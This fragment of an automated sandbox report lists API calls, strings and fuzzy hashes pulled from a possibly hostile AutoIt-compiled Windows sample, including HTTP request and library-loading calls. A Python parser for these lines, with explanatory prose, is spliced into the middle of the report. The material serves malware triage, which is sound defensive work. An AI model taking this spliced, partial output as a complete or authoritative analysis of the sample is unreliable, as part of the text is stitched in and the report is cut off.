• Instruction Fuzzy Hash: 09F01D32641558BBE7215BA69C0DEEB7B7CEBCAB11F000279FA08D10519AA51A0687B9
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00497243
• EnterCriticalSection.KERNEL32(?,?,00440EE4,?,?), ref: 00497254
• TerminateThread.KERNEL32(00000000,000001F6,?,00440EE4,?,?), ref: 00497261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00440EE4,?,?), ref: 0049726E
  • Part of subcall function 00496C35: CloseHandle.KERNEL32(00000000,?,0049727B,?,00440EE4,?,?), ref: 00496C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00497281
• LeaveCriticalSection.KERNEL32(?,?,00440EE4,?,?), ref: 00497288
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 9ff539d8e1522470b581f9d755e579b58bd1f14244f093c6b0f9c5f17020fdcd
• Instruction ID: b3ff6f2962ed6495aff27199c9574fa92e6bfc2536a4f7faf5cb2ae373d6ca30
• Opcode Fuzzy Hash: 9ff539d8e1522470b581f9d755e579b58bd1f14244f093c6b0f9c5f17020fdcd
• Instruction Fuzzy Hash: 09F05E36540612EBDB161B64ED4CADB7B29EF45702B1006B2F507950A0CB7A5C05CB58
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0048899D
• UnloadUserProfile.USERENV(?,?), ref: 004889A9
• CloseHandle.KERNEL32(?), ref: 004889B2
• CloseHandle.KERNEL32(?), ref: 004889BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 004889C3
• HeapFree.KERNEL32(00000000), ref: 004889CA
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 812a234739518f6ab167ce24ea6f197e1148ac0a583ca9bacb5e4406cd255783
• Instruction ID: cf1c454f80ad9c11f746e58b73202d35af95f9cdd7e1cb226c02a7340fe63b4b
• Opcode Fuzzy Hash: 812a234739518f6ab167ce24ea6f197e1148ac0a583ca9bacb5e4406cd255783
• Instruction Fuzzy Hash: 9DE0C276004401FBDA011FE5EC0C90ABBA9FB89322B148730F21981070CB32A828DB58
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 004876EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 00487702
• CLSIDFromProgID.OLE32(?,?,00000000,004BFB80,000000FF,?,00000000,00000800,00000000,?,004C2C7C,?), ref: 00487727
• _memcmp.LIBCMT ref: 00487748
Strings
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,L
• API String ID: 314563124-2286747779
• Opcode ID: 089deda58d4d1e1e4cf8c398a329a87cfe8cd84680ce6e4f4f5e0a1f033e4560
• Instruction ID: 07271a76de31aa03033335f5927c3553df63c75a1a09cda362ff46b5e01428f6
• Opcode Fuzzy Hash: 089deda58d4d1e1e4cf8c398a329a87cfe8cd84680ce6e4f4f5e0a1f033e4560
• Instruction Fuzzy Hash: E2814C71A00109EFCB00DFA8C994EEEB7B9FF89315F204559F505AB250DB75AE06CB64
APIs
• VariantInit.OLEAUT32(?), ref: 004A8613
• CharUpperBuffW.USER32(?,?), ref: 004A8722
• VariantClear.OLEAUT32(?), ref: 004A889A
  • Part of subcall function 00497562: VariantInit.OLEAUT32(00000000), ref: 004975A2
  • Part of subcall function 00497562: VariantCopy.OLEAUT32(00000000,?), ref: 004975AB
  • Part of subcall function 00497562: VariantClear.OLEAUT32(00000000), ref: 004975B7
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 5024eb12674345b9fb504591349bf8290733c6462321e1e38230358a64f9add4
• Instruction ID: 5012a50a711c94112b01d46ef9ddd1fb23ff9c35be60de1a0ef252e2c4b1f56d
• Opcode Fuzzy Hash: 5024eb12674345b9fb504591349bf8290733c6462321e1e38230358a64f9add4
• Instruction Fuzzy Hash: E8917D746043019FCB10EF25C48595BBBE4EF9A718F14492EF88A8B361DB39ED05CB56
APIs
  • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
• _memset.LIBCMT ref: 00492B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00492BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00492C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00492C97
Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: 8f1d9494837154491a22251082912b83c40564d0d7a791eab76941416487efc0
                                                              • Instruction ID: e97f22ad12ceca9444f0708233e55c12eed16d9557aea7680a9cfcfedcce4815
                                                              • Opcode Fuzzy Hash: 8f1d9494837154491a22251082912b83c40564d0d7a791eab76941416487efc0
                                                              • Instruction Fuzzy Hash: 2851CF71508301ABDB24DE28DA45A6FBBE4AF49314F140A3FF895D3291DBA8DC04C75A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_free
                                                              • String ID: 3cD$_D
                                                              • API String ID: 2620147621-3978952248
                                                              • Opcode ID: e090d765b035382bcef98ecd10ad2894956fcb899a1586ff23b89ff9c2ddccfa
                                                              • Instruction ID: 44648c3fd66566955b7360c43d0d55246b43508309d19801bbbbb75dd75163aa
                                                              • Opcode Fuzzy Hash: e090d765b035382bcef98ecd10ad2894956fcb899a1586ff23b89ff9c2ddccfa
                                                              • Instruction Fuzzy Hash: CF518B716043418FEB25CF28C840BABBBF1BF85715F08882EE98987351DB39E905CB46
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$_memmove
                                                              • String ID: 3cD$ERCP
                                                              • API String ID: 2532777613-125502418
                                                              • Opcode ID: d40b2a8e53cf3c6ade2d1d77dd64fecbc772663c7f4379d6d650221474c0d2fe
                                                              • Instruction ID: 6f8bcde29cef68ecf4d0aa0d9042c88e88379e736faca872e6b20a3d5d75084a
                                                              • Opcode Fuzzy Hash: d40b2a8e53cf3c6ade2d1d77dd64fecbc772663c7f4379d6d650221474c0d2fe
                                                              • Instruction Fuzzy Hash: 04519171900705DBEB24DF55C941BABB7E4BF05305F20896FE84ACB281E778AA45CB49
                                                              APIs
                                                              • _memset.LIBCMT ref: 004927C0
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004927DC
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00492822
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004F5890,00000000), ref: 0049286B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 80114f351545fe8a704645891bc162c4211c3dc2cc5009dd3b64f587a613ec52
                                                              • Instruction ID: 01fdf02e388fa77dde16f8afbd4d2b9804049fb124e960108d4c2b1a23fab469
                                                              • Opcode Fuzzy Hash: 80114f351545fe8a704645891bc162c4211c3dc2cc5009dd3b64f587a613ec52
                                                              • Instruction Fuzzy Hash: 7D41A170204301AFDB20EF25C944F1BBBE4AF85314F044A3EF96597391D7B8A905CB6A
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004AD7C5
                                                                • Part of subcall function 0043784B: _memmove.LIBCMT ref: 00437899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower_memmove
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 3425801089-567219261
                                                              • Opcode ID: e364e49c01f62f0c0c4bd926dc64376140f5ed8904fb49a70acd8b8f9fccf41c
                                                              • Instruction ID: 0d80f2cfec8683ee69c47bb89b25ac92fb8fedaec973c558a8aac2c704ea6a84
                                                              • Opcode Fuzzy Hash: e364e49c01f62f0c0c4bd926dc64376140f5ed8904fb49a70acd8b8f9fccf41c
                                                              • Instruction Fuzzy Hash: 44319C70904205ABCF10EF59CC519AEB3A5FF25324F108A2FE876976D1DB39AD05CB88
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00488F14
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00488F27
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00488F57
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_memmove$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 365058703-1403004172
                                                              • Opcode ID: 79b55b30ab963ce35180daf9ba0a84bf754a26ab4e4be4c4df7cb43368df3afd
                                                              • Instruction ID: 47e3114adf5811cb32fb202004234b244224dcc7077b915bcbd3e4b95e60541c
                                                              • Opcode Fuzzy Hash: 79b55b30ab963ce35180daf9ba0a84bf754a26ab4e4be4c4df7cb43368df3afd
                                                              • Instruction Fuzzy Hash: 0D21F571A00108BBDB14BBA18C45DFFB769DF05324F54492FF925A72E1DB3D180A9718
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004A184C
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004A1872
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004A18A2
                                                              • InternetCloseHandle.WININET(00000000), ref: 004A18E9
                                                                • Part of subcall function 004A2483: GetLastError.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A2498
                                                                • Part of subcall function 004A2483: SetEvent.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: d3d0066d328c56f793d533431c698c9215fd976ec39a09b328f6bfbd44e804d5
                                                              • Instruction ID: c634f435d72239a16352a0f347decf4f3136bb65124c70eb57dfed4f6ad5d61c
                                                              • Opcode Fuzzy Hash: d3d0066d328c56f793d533431c698c9215fd976ec39a09b328f6bfbd44e804d5
                                                              • Instruction Fuzzy Hash: C821B0B1500308BFEB11AF65CC85EBB77EDEB5A748F10412FF80596250EA6C8D0597A9
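The API lines in this report have a fixed shape: `Name.MODULE(args), ref: VA`, with a `Part of subcall function XXXXXXXX:` prefix for calls reached through a callee, and statically linked CRT entries such as `_memset.LIBCMT ref: ...` that carry no argument list. The Python below is an added example, not part of the Joe Sandbox output, that parses such lines into records so a triager can list the imported APIs per module, compute RVAs against the dump base, or pull out calls that pass a literal such as the `nul` device name. The sample input is constructed from lines of this report, and the image base 0x00430000 is taken from the `Offset: 00430000` field of the Memory Dump Source entries; both are assumptions of the example, not output of the tool.

```python
"""Parser for the per-function "APIs" lines of a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Matches both top-level calls and "Part of subcall function XXXXXXXX:" lines.
# CRT entries ("_memset.LIBCMT ref: ...") have no argument list and no comma
# before "ref:", so both parts are optional.
_LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Assumed from "Offset: 00430000, based on PE: true" in the Memory Dump Source block.
IMAGE_BASE = 0x00430000


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # raw argument tokens as printed ('?' = unresolved by the plugin)
    ref: int               # call-site virtual address from the dump
    parent: Optional[int]  # owning function when the line is a "Part of subcall" entry

    @property
    def rva(self) -> int:
        return self.ref - IMAGE_BASE

    @property
    def is_import(self) -> bool:
        # LIBCMT entries are statically linked CRT code, not imports from a DLL.
        return self.module.upper() != "LIBCMT"


def parse_api_trace(text: str) -> List[ApiCall]:
    """Parse every API bullet line in `text`; headings such as APIs/Strings are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] else ()
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), parent))
    return calls


def imports_by_module(calls: List[ApiCall]) -> Dict[str, Set[str]]:
    """Distinct DLL-imported API names grouped by module (CRT entries excluded)."""
    out: Dict[str, Set[str]] = {}
    for c in calls:
        if c.is_import:
            out.setdefault(c.module, set()).add(c.api)
    return out


def calls_with_literal(calls: List[ApiCall], literal: str) -> List[ApiCall]:
    """Calls whose printed arguments contain a literal token, e.g. the 'nul' device name."""
    return [c for c in calls if literal in c.args]


# Constructed sample: a handful of lines copied from the function entries of this report.
SAMPLE_TRACE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00496DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00496DEF
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00496E3B
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004A184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004A1872
  • Part of subcall function 004A2483: GetLastError.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A2498
• _memset.LIBCMT ref: 00492B87
Strings
"""

if __name__ == "__main__":
    parsed = parse_api_trace(SAMPLE_TRACE)
    for module, names in sorted(imports_by_module(parsed).items()):
        print(f"{module}: {', '.join(sorted(names))}")
    for c in calls_with_literal(parsed, "nul"):
        print(f"{c.api} at RVA {c.rva:#x} opens the nul device")
```

Feeding the whole report through `parse_api_trace` gives a per-module import set without the CRT noise, which is the quickest way to confirm that the WININET, USER32 and KERNEL32 calls the plugin resolved match the capabilities listed in the report header.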
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004B6461
                                                              • LoadLibraryW.KERNEL32(?), ref: 004B6468
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004B647D
                                                              • DestroyWindow.USER32(?), ref: 004B6485
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: a521bb101b4ec74a018dd755f094dd066bdc75777d3538f45309c5f46166d11b
                                                              • Instruction ID: 1d57da3fb96959cbcb1a8fd3ad3756badc35df23b968db322180204fa327f985
                                                              • Opcode Fuzzy Hash: a521bb101b4ec74a018dd755f094dd066bdc75777d3538f45309c5f46166d11b
                                                              • Instruction Fuzzy Hash: 80218E71100605BFEF108F64DC40EFB77A9EB59328F12462AFA1492290D77DDC519778
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00496DBC
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00496DEF
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00496E01
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00496E3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 99aeeb637150f4b1465c64a9be9c05f7a34a340b5fe12e8b270088efed70712b
                                                              • Instruction ID: 7f3f7da2e7f6bc767c640a524b70d37489df9273f3f1e94aa14c1a768524d900
                                                              • Opcode Fuzzy Hash: 99aeeb637150f4b1465c64a9be9c05f7a34a340b5fe12e8b270088efed70712b
                                                              • Instruction Fuzzy Hash: 56218C7460020AABDF209F29DC04A9A7FA8EF44720F214B3AFCA0D73D0DB759955CB58
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00496E89
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00496EBB
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00496ECC
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00496F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 682a466c2b3d5b12d3f7165aa0fef70d1b9d2f603ce815ade2a4f0832fab97c4
                                                              • Instruction ID: f86c81b4f66469c7d11070121aab3787c2ac66c466e92ca1ccf95872ef2439d7
                                                              • Opcode Fuzzy Hash: 682a466c2b3d5b12d3f7165aa0fef70d1b9d2f603ce815ade2a4f0832fab97c4
                                                              • Instruction Fuzzy Hash: 90219079500305ABDF209F69DC04A9B7BA8EF45724F210B3AF8A0D73D0D774A8518B59
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049AC54
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0049ACA8
                                                              • __swprintf.LIBCMT ref: 0049ACC1
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,004BF910), ref: 0049ACFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 32313a419c3528fbfd0c99ccd6304dec6354f464f9d49fa6895853e2cfc38de7
                                                              • Instruction ID: d3dac4c3fa80b13c47912213b8c96f35cea2868ef054f22dc93a4b1af532dc8a
                                                              • Opcode Fuzzy Hash: 32313a419c3528fbfd0c99ccd6304dec6354f464f9d49fa6895853e2cfc38de7
                                                              • Instruction Fuzzy Hash: 4521A470600109AFCB10EF59CD45EAE7BB8EF49318B00447EF809EB251DA75EE05CB65
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 0049115F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 00491184
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 0049118E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0048FCED,?,00490D40,?,00008000), ref: 004911C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID: @I
                                                              • API String ID: 2875609808-896914347
                                                              • Opcode ID: 533c9849eaad2fc183a7a2b1d88e695b247915029a77acd1e0f1842994d18589
                                                              • Instruction ID: affee40a5d7ecd4052049719faedbd6a62e2dbb764091929e6f5f7bdc139d94d
                                                              • Opcode Fuzzy Hash: 533c9849eaad2fc183a7a2b1d88e695b247915029a77acd1e0f1842994d18589
                                                              • Instruction Fuzzy Hash: 78115A31C0051EE7CF009FA9D88AAEEBF78FF09711F004566EA45B2250CB349954CB99
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00491B19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: 2ba08271f9e359f9b2b68cd91abd4a378a45cbe0f207c2b72b9d5964110c3e38
                                                              • Instruction ID: e61f98d31fae9714ed9c338df4e5a2300e656c9e54dbd1d1e3d4551d6d6e3fa1
                                                              • Opcode Fuzzy Hash: 2ba08271f9e359f9b2b68cd91abd4a378a45cbe0f207c2b72b9d5964110c3e38
                                                              • Instruction Fuzzy Hash: 18118E359002499FCF00EF55D8518FEB7B5FF25309B10846AD819672A2EB366D0ACB48
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004AEC07
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004AEC37
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004AED6A
                                                              • CloseHandle.KERNEL32(?), ref: 004AEDEB
                                                              Memory Dump Source
